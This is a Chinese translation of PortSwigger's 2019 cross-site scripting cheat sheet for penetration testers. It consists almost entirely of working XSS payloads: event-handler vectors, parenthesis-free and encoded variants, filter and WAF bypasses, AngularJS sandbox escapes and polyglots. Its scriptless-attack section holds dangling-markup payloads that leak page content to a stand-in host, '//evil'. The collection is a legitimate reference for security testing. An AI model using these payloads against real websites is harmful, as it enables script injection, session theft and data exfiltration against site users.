原文出处: 跨站脚本(XSS)备忘单-2019版 对整理者表示感谢,恭喜发财!!!
老外原文: https://portswigger.net/web-security/cross-site-scripting/cheat-sheet
这是一份跨站脚本(XSS)备忘录,收集了大量的XSS攻击向量,包含了各种事件处理、通讯协议、特殊属性、限制字符、编码方式、沙箱逃逸等技巧,可以帮助渗透测试人员绕过WAF和过滤机制。
译者注:原文由Portswigger公司的Web安全学院于2019年定期更新,对的,就是那家开发著名渗透工具Burp suite的公司,最后更新时间:2019年11月8日星期五10:58:07。
事件处理
不需要用户交互的事件处理程序
激活元素时触发(IE)
<a id=x tabindex=1 onactivate=alert(1)></a>
页面打印后触发(Chrome、Firefox、IE)
<body onafterprint=alert(1)>
CSS动画取消时触发(Firefox)
<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><a id=x style="position:absolute;" onanimationcancel="alert(1)"></a>
CSS动画结束时触发(Chrome、Firefox、IE、Safari)
<style>@keyframes x{}</style><a style="animation-name:x" onanimationend="alert(1)"></a>
重复CSS动画时触发(Chrome、Firefox、IE、Safari)
<style>@keyframes slidein {}</style><a style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></a>
CSS动画开始时触发(Chrome、Firefox、IE、Safari)
<style>@keyframes x{}</style><a style="animation-name:x" onanimationstart="alert(1)"></a>
在激活元素之前触发(IE)
<a id=x tabindex=1 onbeforeactivate=alert(1)></a>
在停用元素之前触发(IE)
<a id=x tabindex=1 onbeforedeactivate=alert(1)></a><input autofocus>
在页面打印前触发(Chrome、Firefox、IE)
<body onbeforeprint=alert(1)>
网址更改后触发(Chrome)
<svg><animate onbegin=alert(1) attributeName=x dur=1s>
svg动画开始时触发(Chrome、Firefox、Safari)
<svg><animate onbegin=alert(1) attributeName=x dur=1s>
当元素失去焦点时触发(Chrome、IE、Safari)
<a onblur=alert(1) tabindex=1 id=x></a><input autofocus>
选框弹跳时触发(Firefox、IE)
<marquee width=1 loop=1 onbounce=alert(1)>XSS</marquee>
如果资源可以播放则触发(Chrome、Firefox、IE、Safari)
<audio oncanplay=alert(1)><source src="validaudio.wav" type="audio/wav"></audio>
加载足够的数据以完全播放资源时触发(Chrome、Firefox、IE、Safari)
<video oncanplaythrough=alert(1)><source src="validvideo.mp4" type="video/mp4"></video>
停用元素时触发(IE)
<a id=x tabindex=1 ondeactivate=alert(1)></a><input id=y autofocus>
资源播放完毕时触发(Chrome、Firefox、IE、Safari)
<audio controls autoplay onended=alert(1)><source src="validaudio.wav" type="audio/wav"></audio>
资源加载失败或导致错误时触发(Chrome、Firefox、IE、Safari)
<audio src/onerror=alert(1)>
选框完成时触发(Firefox、IE)
<marquee width=1 loop=1 onfinish=alert(1)>XSS</marquee>
当元素具有焦点时触发(Chrome、IE、Safari)
<a id=x tabindex=1 onfocus=alert(1)></a>
当元素具有焦点时触发(Chrome、IE、Safari)
<a id=x tabindex=1 onfocusin=alert(1)></a>
当元素失去焦点时触发(Chrome、IE、Safari)
<a onfocusout=alert(1) tabindex=1 id=x></a><input autofocus>
如果哈希值更改,则触发(Chrome、Firefox、IE、Safari)
<body onhashchange="alert(1)">
加载元素时触发(Safari)
<svg><a onload=alert(1)></a>
加载第一帧时触发(Chrome、Firefox、IE、Safari)
<audio onloadeddata=alert(1)><source src="validaudio.wav" type="audio/wav"></audio>
加载元数据时触发(Chrome、Firefox、IE、Safari)
<audio autoplay onloadedmetadata=alert(1)> <source src="validaudio.wav" type="audio/wav"></audio>
当元素完成加载时触发(Firefox)
<image src=validimage.png onloadend=alert(1)>
当元素开始加载时触发(Firefox)
<image src=validimage.png onloadstart=alert(1)>
当从postMessage调用接收到消息事件时触发(Chrome、Firefox、IE、Safari)
<body onmessage=alert(1)>
显示页面时触发(Chrome、Firefox、IE、Safari)
<body onpageshow=alert(1)>
播放资源时触发(Chrome、Firefox、IE、Safari)
<audio autoplay onplay=alert(1)><source src="validaudio.wav" type="audio/wav"></audio>
触发资源正在播放(Chrome、Firefox、IE、Safari)
<audio autoplay onplaying=alert(1)><source src="validaudio.wav" type="audio/wav"></audio>
历史记录更改时触发(Chrome、Firefox、IE、Safari)
<body onpopstate=alert(1)>
svg动画重复时触发(Chrome、Firefox、Safari)
<svg><animate onrepeat=alert(1) attributeName=x dur=1s repeatCount=2 />
调整窗口大小时触发(Chrome、Firefox、IE、Safari)
<body onresize="alert(1)">
页面滚动时触发(Chrome、Firefox、IE、Safari)
<body onscroll=alert(1)><div style=height:1000px></div><div id=x></div>
选框开始时触发(Firefox、IE)
<marquee onstart=alert(1)>XSS</marquee>
更改时间轴时触发(Chrome、Firefox、IE、Safari)
<audio controls autoplay ontimeupdate=alert(1)><source src="validaudio.wav" type="audio/wav"></audio>
展开详细信息标签时触发(Chrome、Firefox、IE、Safari)
<details ontoggle=alert(1) open>test</details>
CSS过渡取消时触发(Firefox)
<style>:target {color: red;}</style><a id=x style="transition:color 10s" ontransitioncancel=alert(1)></a>
CSS过渡结束时触发(Chrome)
<style>:target {color:red;}</style><a id=x style="transition:color 1s" ontransitionend=alert(1)></a>
CSS过渡开始时触发(Firefox)
<style>:target {transform: rotate(180deg);}</style><a id=x style="transition:transform 2s" ontransitionrun=alert(1)></a>
未履行承诺时触发(Firefox)
<body onunhandledrejection=alert(1)><script>fetch('//xyz')</script>
等待数据时触发(IE)
<video autoplay controls onwaiting=alert(1)><source src="validvideo.mp4" type=video/mp4></video>
需要用户交互的事件处理程序
右键单击或使用鼠标中键时触发(Chrome、Firefox)
<input onauxclick=alert(1)>
需要复制一段文字(Chrome、Firefox、IE、Safari)
<a onbeforecopy="alert(1)" contenteditable>test</a>
要求剪切一段文字(Chrome、Firefox、IE、Safari)
<a onbeforecut="alert(1)" contenteditable>test</a>
需要粘贴一段文字(IE)
<a onbeforepaste="alert(1)" contenteditable>test</a>
需要属性值的变化(Chrome、Firefox、IE、Safari)
<input onchange=alert(1) value=xss>
需要点击一下元素(Chrome、Firefox、IE、Safari)
<a onclick="alert(1)">test</a>
右键单击以显示上下文菜单时触发(Chrome、Firefox、IE、Safari)
<a oncontextmenu="alert(1)">test</a>
需要复制一段文字(Chrome、Firefox、IE、Safari)
<a oncopy="alert(1)" contenteditable>test</a>
要求剪切一段文字(Chrome、Firefox、IE、Safari)
<a oncut="alert(1)" contenteditable>test</a>
双击元素时触发(Chrome、Firefox、IE、Safari)
<a ondblclick="alert(1)">test</a>
触发拖动元素(Chrome、Firefox、IE、Safari)
<a draggable="true" ondrag="alert(1)">test</a>
触发拖动已在元素上完成(Chrome、Firefox、IE、Safari)
<a draggable="true" ondragend="alert(1)">test</a>
需要鼠标拖动(Chrome、Firefox、IE、Safari)
<a draggable="true" ondragenter="alert(1)">test</a>
需要鼠标拖动(Chrome、Firefox、IE、Safari)
<a draggable="true" ondragleave="alert(1)">test</a>
触发拖动元素(Chrome、Firefox、IE、Safari)
<div draggable="true" contenteditable>drag me</div><a ondragover=alert(1) contenteditable>drop here</a>
需要鼠标拖动(Chrome、Firefox、IE、Safari)
<a draggable="true" ondragstart="alert(1)">test</a>
触发删除可拖动元素(Chrome、Firefox、IE、Safari)
<div draggable="true" contenteditable>drag me</div><a ondrop=alert(1) contenteditable>drop here</a>
需要作为价值的变化(Chrome、Firefox、IE、Safari)
<input oninput=alert(1) value=xss>
需要具有不满足其约束的元素(例如必填属性)的表单提交。(Chrome、Firefox、IE、Safari)
<form><input oninvalid=alert(1) required><input type=submit>
按下键时触发(Chrome、Firefox、IE、Safari)
<a onkeydown="alert(1)" contenteditable>test</a>
按下键时触发(Chrome、Firefox、IE、Safari)
<a onkeypress="alert(1)" contenteditable>test</a>
释放按键时触发(Chrome、Firefox、IE、Safari)
<a onkeyup="alert(1)" contenteditable>test</a>
按下鼠标时触发(Chrome、Firefox、IE、Safari)
<a onmousedown="alert(1)">test</a>
当鼠标悬停在元素上时触发(Chrome、Firefox、IE、Safari)
<a onmouseenter="alert(1)">test</a>
当鼠标移离元素时触发(Chrome、Firefox、IE、Safari)
<a onmouseleave="alert(1)">test</a>
需要鼠标移动(Chrome、Firefox、IE、Safari)
<a onmousemove="alert(1)">test</a>
当鼠标移离元素时触发(Chrome、Firefox、IE、Safari)
<a onmouseout="alert(1)">test</a>
需要将鼠标悬停在元素上(Chrome、Firefox、IE、Safari)
<a onmouseover="alert(1)">test</a>
释放鼠标按钮时触发(Chrome、Firefox、IE、Safari)
<a onmouseup="alert(1)">test</a>
需要粘贴一段文字(Chrome、Firefox、IE、Safari)
<a onpaste="alert(1)" contenteditable>test</a>
需要点击元素才能暂停(Chrome、Firefox、IE、Safari)
<audio autoplay controls onpause=alert(1)><source src="validaudio.wav" type="audio/wav"></audio>
需要点击(Chrome、Firefox、IE、Safari)
<form onreset=alert(1)><input type=reset>
提交表单并且输入具有搜索的type属性时触发(Chrome)
<form><input type=search onsearch=alert(1) value="Hit return" autofocus>
需要点击元素时间轴(Chrome、Firefox、IE、Safari)
<audio autoplay controls onseeked=alert(1)><source src="validaudio.wav" type="audio/wav"></audio>
需要点击元素时间轴(Chrome、Firefox、IE、Safari)
<audio autoplay controls onseeking=alert(1)><source src="validaudio.wav" type="audio/wav"></audio>
需要选择文字(Chrome、Firefox、IE、Safari)
<input onselect=alert(1) value="XSS" autofocus>
需要提交表单(Chrome、Firefox、IE、Safari)
<form onsubmit=alert(1)><input type=submit>
需要在页面上的任意位置单击并重新加载(Chrome)
<svg onunload=window.open('javascript:alert(1)')>
需要调节音量(Chrome、Firefox、IE、Safari)
<audio autoplay controls onvolumechange=alert(1)><source src="validaudio.wav" type="audio/wav"></audio>
使用鼠标滚轮时触发(Chrome、Firefox、IE、Safari)
<body onwheel=alert(1)>
限制字符
无括号,使用异常处理
<script>onerror=alert;throw 1</script>
无括号,无分号,使用异常处理
<script>{onerror=alert}throw 1</script>
无括号的异常处理,没有使用表达式的半冒号
<script>throw onerror=alert,1</script>
无括号异常处理和evil
<script>throw onerror=eval,'=alert\x281\x29'</script>
无括号,在Firefox上使用异常处理和evil
<script>{onerror=eval}throw{lineNumber:1,columnNumber:1,fileName:1,message:'alert\x281\x29'}</script>
无括号,使用ES6 hasInstance和instanceof与eval
<script>'alert\x281\x29'instanceof{[Symbol.hasInstance]:eval}</script>
无括号,使用ES6的hasInstance和instanceof以及eval
<script>'alert\x281\x29'instanceof{[Symbol['hasInstance']]:eval}</script>
无括号,使用位置重定向
<script>location='javascript:alert\x281\x29'</script>
无字符串,使用位置没有括号重定向
<script>location=name</script>
无括号,使用模板字符串
<script>alert`1`</script>
前端框架
Bootstrap onanimationstart事件
<xss class="progress-bar-animated" onanimationstart=alert(1)>
Bootstrap ontransitionend事件
<xss class="carousel slide" data-ride=carousel data-interval=100 ontransitionend=alert(1)><xss class="carousel-inner"><xss class="carousel-item active"></xss><xss class="carousel-item"></xss></xss></xss>
通讯协议
iframe src属性JavaScript协议
<iframe src="javascript:alert(1)">
具有JavaScript协议的对象data属性
<object data="javascript:alert(1)">
使用JavaScript协议嵌入src属性
<embed src="javascript:alert(1)">
标准的JavaScript协议
<a href="javascript:alert(1)">XSS</a>
不区分大小写的协议
<a href="JaVaScript:alert(1)">XSS</a>
协议之前允许使用字符\x01- \x20
<a href=" javascript:alert(1)">XSS</a>
协议中允许使用字符\ x09,\x0a,\x0d
<a href="javas cript:alert(1)">XSS</a>
协议名称后在冒号前允许字符\x09,\x0a,\x0d
<a href="javas cript:alert(1)">XSS</a>
带有JavaScript协议的SVG中的Xlink命名空间
<svg><a xlink:href="javascript:alert(1)"><text x="20" y="20">XSS</text></a>
使用值的SVG动画标签
<svg><animate xlink:href=#xss attributeName=href values=javascript:alert(1) /><a id=xss><text x=20 y=20>XSS</text></a>
SVG动画标签用于
<svg><animate xlink:href=#xss attributeName=href from=javascript:alert(1) to=1 /><a id=xss><text x=20 y=20>XSS</text></a>
SVG设置标签
<svg><set xlink:href=#xss attributeName=href from=? to=javascript:alert(1) /><a id=xss><text x=20 y=20>XSS</text></a>
脚本src中的数据协议
<script src="data:text/javascript,alert(1)"></script>
SVG脚本href属性,无需关闭脚本标签
<svg><script href="data:text/javascript,alert(1)" />
SVG使用元素Chrome/Firefox
<svg><use href="data:image/svg+xml,<svg id='x' xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' width='100' height='100'><a xlink:href='javascript:alert(1)'><rect x='0' y='0' width='100' height='100' /></a></svg>#x"></use></svg>
带有数据URL的导入语句
<script>import('data:text/javascript,alert(1)')</script>
具有JavaScript协议的基本标记重写了相对URL
<base href="javascript:/a/-alert(1)///////"><a href=../lol/safari.html>test</a>
MathML使任何标签都可点击
<math><x href="javascript:alert(1)">blah
按钮和动作
<form><button formaction=javascript:alert(1)>XSS
输入和形式
<form><input type=submit formaction=javascript:alert(1) value=XSS>
形式与行动
<form action=javascript:alert(1)><input type=submit value=XSS>
Isindex和formaction
<isindex type=submit formaction=javascript:alert(1)>
index和action
<isindex type=submit action=javascript:alert(1)>
将元素与外部网址一起使用
<svg><use href="//subdomain1.portswigger-labs.net/use_element/upload.php#x" /></svg>
其他有用的属性
使用srcdoc属性
<iframe srcdoc="<img src=1 onerror=alert(1)>"></iframe>
对实体使用srcdoc
<iframe srcdoc="<img src=1 onerror=alert(1)>"></iframe>
在页面上的任何位置(甚至在表单外部)单击提交元素
<form action="javascript:alert(1)"><input type=submit id=x></form><label for=x>XSS</label>
隐藏的输入:访问键属性可以在通常无法利用的元素上启用XSS
<input type="hidden" accesskey="X" onclick="alert(1)"> (Press ALT+SHIFT+X on Windows) (CTRL+ALT+X on OS X)
链接元素:访问键属性可以在通常无法利用的元素上启用XSS
<link rel="canonical" accesskey="X" onclick="alert(1)" /> (Press ALT+SHIFT+X on Windows) (CTRL+ALT+X on OS X)
下载属性可以保存当前网页的副本
<a href=# download="filename.html">Test</a>
使用Referrerpolicy禁用引荐来源网址
<img referrerpolicy="no-referrer" src="//portswigger-labs.net">
特殊标签
重定向到其他域
<meta http-equiv="refresh" content="0; url=//portswigger-labs.net">
元字符集属性UTF-7
<meta charset="UTF-7" /> +ADw-script+AD4-alert(1)+ADw-/script+AD4-
元字符集UTF-7
<meta http-equiv="Content-Type" content="text/html; charset=UTF-7" /> +ADw-script+AD4-alert(1)+ADw-/script+AD4-
UTF-7 BOM字符(必须在文档开头)1
+/v8
+ADw-script+AD4-alert(1)+ADw-/script+AD4-
UTF-7 BOM字符(必须在文档开头)2
+/v9
+ADw-script+AD4-alert(1)+ADw-/script+AD4-
UTF-7 BOM字符(必须在文档开头)3
+/v+
+ADw-script+AD4-alert(1)+ADw-/script+AD4-
UTF-7 BOM字符(必须在文档开头)4
+/v/
+ADw-script+AD4-alert(1)+ADw-/script+AD4-
升级不安全的请求
<meta http-equiv="Content-Security-Policy" content="upgrade-insecure-requests">
通过iframe沙箱禁用JavaScript
<iframe sandbox src="//portswigger-labs.net"></iframe>
禁用引荐来源
<meta name="referrer" content="no-referrer">
编码方式
超长UTF-8
%C0%BCscript>alert(1)</script>
%E0%80%BCscript>alert(1)</script>
%F0%80%80%BCscript>alert(1)</script>
%F8%80%80%80%BCscript>alert(1)</script>
%FC%80%80%80%80%BCscript>alert(1)</script>
Unicode转义
<script>\u0061lert(1)</script>
Unicode转义ES6样式
<script>\u{61}lert(1)</script>
Unicode转义ES6样式零填充
<script>\u{0000000061}lert(1)</script>
十六进制编码JavaScript转义
<script>eval('\x61lert(1)')</script>
八进制编码
<script>eval('\141lert(1)')</script>
<script>eval('alert(\061)')</script>
<script>eval('alert(\61)')</script>
带有可选分号的十进制编码
<a href="javascript:alert(1)">XSS</a><a href="javascript:alert(1)">XSS</a>
带有HTML编码的SVG脚本
<svg><script>alert(1)</script></svg>
<svg><script>alert(1)</script></svg>
<svg><script>alert
(1)</script></svg>
<svg><script>x="",alert(1)//";</script></svg>
带填充零的十进制编码
<a href="javascript:alert(1)">XSS</a>
十六进制编码实体
<a href="javascript:alert(1)">XSS</a>
如果下一个字符不是a-f0-9,则不使用分号的十六进制编码
<a href="javascript:alert(1)">XSS</a>
<a href="j
avascript:alert(1)">XSS</a>
<a href="j avascript:alert(1)">XSS</a>
带填充零的十六进制编码
<a href="javascript:alert(1)">XSS</a>
十六进制编码不区分大小写
<a href="javascript:alert(1)">XSS</a>
HTML实体
<a href="javascript:alert(1)">XSS</a>
<a href="java	script:alert(1)">XSS</a>
<a href="java
script:alert(1)">XSS</a>
<a href="javascript:alert(1)">XSS</a>
网址编码
<a href="javascript:x='%27-alert(1)-%27';">XSS</a>
HTML实体和URL编码
<a href="javascript:x='%27-alert(1)-%27';">XSS</a>
混淆
Firefox在&之后允许NULL
<a href="javascriptjavascript:alert(1)">Firefox</a>
Firefox允许在命名实体内使用NULL
<a href="javascript:alert(1)">Firefox</a>
Firefox在开头的注释中允许使用NULL字符
<!-- ><img title="--><iframe/onload=alert(1)>"> -->
<!-- ><img title="--><iframe/onload=alert(1)>"> -->
带有base64的脚本src中的数据协议
<script src=data:text/javascript;base64,YWxlcnQoMSk=></script>
客户端模板注入
AngularJS沙箱逃逸
版本:1.0.1-1.1.5
{{constructor.constructor('alert(1)')()}}
版本:1.0.1-1.1.5(较短)
{{$on.constructor('alert(1)')()}}
版本:1.2.0-1.2.1
{{a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(1)')()}}
版本:1.2.2-1.2.5
{{{}.")));alert(1)//"}}
版本:1.2.6-1.2.18
{{(_=''.sub).call.call({}[$='constructor'].getOwnPropertyDescriptor(_.__proto__,$).value,0,'alert(1)')()}}
版本:1.2.19-1.2.23
{{toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toString.constructor);}}
版本:1.2.24-1.2.29
{{{}.")));alert(1)//"}}
版本:1.2.27-1.2.29/1.3.0-1.3.20
{{{}.")));alert(1)//"}}
版本:1.3.0
{{!ready && (ready = true) && (
!call
? $$watchers[0].get(toString.constructor.prototype)
: (a = apply) &&
(apply = constructor) &&
(valueOf = call) &&
(''+''.toString(
'F = Function.prototype;' +
'F.apply = F.a;' +
'delete F.a;' +
'delete F.valueOf;' +
'alert(1);'
)));}}
版本:1.3.3-1.3.18
{{{}[{toString:[].join,length:1,0:'__proto__'}].assign=[].join;'a'.constructor.prototype.charAt=[].join;$eval('x=alert(1)//');}}
版本:1.3.19
{{'a'[{toString:false,valueOf:[].join,length:1,0:'__proto__'}].charAt=[].join;$eval('x=alert(1)//');}}
版本:1.3.20
{{'a'.constructor.prototype.charAt=[].join;$eval('x=alert(1)');}}
版本:1.4.0-1.4.9
{{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//');}}
版本:1.5.0-1.5.8
{{x={'y':''.constructor.prototype};x['y'].charAt=[].join;$eval('x=alert(1)');}}
版本:1.5.9-1.5.11
{{
c=''.sub.call;b=''.sub.bind;a=''.sub.apply;
c.$apply=$apply;c.$eval=b;op=$root.$$phase;
$root.$$phase=null;od=$root.$digest;$root.$digest=({}).toString;
C=c.$apply(c);$root.$$phase=op;$root.$digest=od;
B=C(b,c,b);$evalAsync("
astNode=pop();astNode.type='UnaryExpression';
astNode.operator='(window.X?void0:(window.X=true,alert(1)))+';
astNode.argument={type:'Identifier',name:'foo'};
");
m1=B($$asyncQueue.pop().expression,null,$root);
m2=B(C,null,m1);[].push.apply=m2;a=''.sub;
$eval('a(b.c)');[].push.apply=a;
}}
版本:> = 1.6.0
{{constructor.constructor('alert(1)')()}}
版本:> = 1.6.0(较短)
{{$on.constructor('alert(1)')()}}
基于DOM的AngularJS沙箱逃逸
所有版本(Chrome)
<input autofocus ng-focus="$event.path|orderBy:'[].constructor.from([1],alert)'">
所有版本(Chrome)较短
<input id=x ng-focus=$event.path|orderBy:'(z=alert)(1)'>
所有版本(所有浏览器)都较短
<input autofocus ng-focus="$event.composedPath()|orderBy:'[].constructor.from([1],alert)'">
版本:1.2.0-1.5.0
<div ng-app ng-csp><div ng-focus="x=$event;" id=f tabindex=0>foo</div><div ng-repeat="(key, value) in x.view"><div ng-if="key == 'window'">{{ [1].reduce(value.alert, 1); }}</div></div></div>
无脚本攻击
背景属性
<body background="//evil?
<table background="//evil?
<table><thead background="//evil?
<table><tbody background="//evil?
<table><tfoot background="//evil?
<table><td background="//evil?
<table><th background="//evil?
链接href样式表
<link rel=stylesheet href="//evil?
链接href图标
<link rel=icon href="//evil?
Meta刷新
<meta http-equiv="refresh" content="0; http://evil?
Img通过src属性传递标记
<img src="//evil?
<image src="//evil?
使用track元素的视频
<video><track default src="//evil?
使用sourcr元素和src属性的视频
<video><source src="//evil?
使用source元素和src属性的音频
<audio><source src="//evil?
输入src
<input type=image src="//evil?
使用formaction的按钮
<form><button style="width:100%;height:100%" type=submit formaction="//evil?
使用formaction输入
<form><input type=submit value="XSS" style="width:100%;height:100%" type=submit formaction="//evil?
表单使用action
<button form=x style="width:100%;height:100%;"><form id=x action="//evil?
使用src属性的Isindex
<isindex type=image src="//evil?
Isindex使用submit
<isindex type=submit style=width:100%;height:100%; value=XSS formaction="//evil?
Object data
<object data="//evil?
iframe src
<iframe src="//evil?
Embed src
<embed src="//evil?
使用textarea标记并发布到外部站点
<form><button formaction=//evil>XSS</button><textarea name=x>
使用表单目标通过window.name传递标记数据
<button form=x>XSS</button><form id=x action=//evil target='
使用基本目标通过window.name传递标记数据
<a href=http://subdomain1.portswigger-labs.net/dangling_markup/name.html><font size=100 color=red>You must click me</font></a><base target="
使用formtarget通过window.name传递标记数据
<form><input type=submit value="Click me" formaction=http://subdomain1.portswigger-labs.net/dangling_markup/name.html formtarget="
使用基本href传递数据
<a href=abc style="width:100%;height:100%;position:absolute;font-size:1000px;">xss<base href="//evil/
使用embed src从页面传递数据
<embed src=http://subdomain1.portswigger-labs.net/dangling_markup/name.html name="
使用iframe窗口名称从页面传递数据
<iframe src=http://subdomain1.portswigger-labs.net/dangling_markup/name.html name="
使用object窗口名称从页面传递数据
<object data=http://subdomain1.portswigger-labs.net/dangling_markup/name.html name="
使用frameset窗口名称从页面传递数据
<frameset><frame src=http://subdomain1.portswigger-labs.net/dangling_markup/name.html name="
多语言有效载荷
多语言有效载荷1
javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>
多语言有效载荷2
javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \"
onmouseover=/*<svg/*/onload=alert()//>
经典向量(XSS加密)
具有JavaScript协议的Image src
<img src="javascript:alert(1)">
带有JavaScript协议的正文背景
<body background="javascript:alert(1)">
随着现代浏览器使用空来源,iframe数据网址不再起作用
<iframe src="data:text/html,<img src=1 onerror=alert(document.domain)>">
用于IE的VBScript协议
<a href="vbscript:MsgBox+1">XSS</a>
<a href="#" onclick="vbs:Msgbox+1">XSS</a>
<a href="#" onclick="VBS:Msgbox+1">XSS</a>
<a href="#" onclick="vbscript:Msgbox+1">XSS</a>
<a href="#" onclick="VBSCRIPT:Msgbox+1">XSS</a>
<a href="#" language=vbs onclick="vbscript:Msgbox+1">XSS</a>
JScript compact是JS的最小版本,未在IE中广泛使用
<a href="#" onclick="jscript.compact:alert(1);">test</a>
<a href="#" onclick="JSCRIPT.COMPACT:alert(1);">test</a>
JScript.Encode允许编码的JavaScript
<a href=# language="JScript.Encode" onclick="#@~^CAAAAA==C^+.D`8#mgIAAA==^#~@">XSS</a>
<a href=# onclick="JScript.Encode:#@~^CAAAAA==C^+.D`8#mgIAAA==^#~@">XSS</a>
VBScript.Encoded允许编码的VBScript
<iframe onload=VBScript.Encode:#@~^CAAAAA==\ko$K6,FoQIAAA==^#~@>
<iframe language=VBScript.Encode onload=#@~^CAAAAA==\ko$K6,FoQIAAA==^#~@>
用于Netscape Navigator的JavaScript实体
<a title="&{alert(1)}">XSS</a>
Netscape Navigator曾经支持JavaScript样式表
<link href="xss.js" rel=stylesheet type="text/javascript">
用于消耗标记的按钮
<form><button name=x formaction=x><b>stealme
IE9选择元素和纯文本用于消耗标记
<form action=x><button>XSS</button><select name=x><option><plaintext><script>token="supersecret"</script>
仅限XBL Firefox <= 2
<div style="-moz-binding:url(//businessinfo.co.uk/labs/xbl/xbl.xml#xss)">
<div style="\-\mo\z-binding:url(//businessinfo.co.uk/labs/xbl/xbl.xml#xss)">
<div style="-moz-bindin\67:url(//businessinfo.co.uk/lab s/xbl/xbl.xml#xss)">
<div style="-moz-bindin\67:url(//businessinfo.co.uk/lab s/xbl/xbl.xml#xss)">
XBL也使用数据URL在FF3.5中工作
<img src="blah" style="-moz-binding: url(data:text/xml;charset=utf-8,%3C%3Fxml%20version%3D%221.0%22%3F%3E%3Cbindings%20xmlns%3D%22 http%3A//www.mozilla.org/xbl%22%3E%3Cbinding%20id%3D%22loader%22%3E%3Cimplementation%3E%3Cconstructor%3E%3C%21%5BCDATA%5Bvar%20url%20%3D%20%22alert.js %22%3B%20var%20scr%20%3D%20document.createElement%28%22script%22%29%3B%20scr.setAttribute%28%22src%22%2Curl%29%3B%20var%20bodyElement%20%3D%20 document.getElementsByTagName%28%22html%22%29.item%280%29%3B%20bodyElement.appendChild%28scr%29%3B%20%5D%5D%3E%3C/constructor%3E%3C/implementation%3E%3C/ binding%3E%3C/bindings%3E)" />
CSS表达式<= IE7
<div style=xss:expression(alert(1))>
<div style=xss:expression(1)-alert(1)>
<div style=xss:expressio\6e(alert(1))>
<div style=xss:expressio\006e(alert(1))>
<div style=xss:expressio\00006e(alert(1))>
<div style=xss:expressio\6e(alert(1))>
<div style=xss:expressio\6e(alert(1))>
在怪癖模式下,IE允许您使用=代替:
<div style=xss=expression(alert(1))>
<div style="color=red">test</div>
IE较旧模式的行为
<a style="behavior:url(#default#AnchorClick);" folder="javascript:alert(1)">XSS</a>
IE中较旧版本的函数中支持的事件处理程序
<script>
function window.onload(){
alert(1);
}
</script>
<script>
function window::onload(){
alert(1);
}
</script>
<script>
function window.location(){
}
</script>
<body>
<script>
function/*<img src=1 onerror=alert(1)>*/document.body.innerHTML(){}
</script>
</body>
<body>
<script>
function document.body.innerHTML(){ x = "<img src=1 onerror=alert(1)>"; }
</script>
</body>
GreyMagic HTML + time漏洞利用(即使在5 docmode下也不再起作用)
<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<img src=1 onerror=alert(1)>"> </BODY></HTML>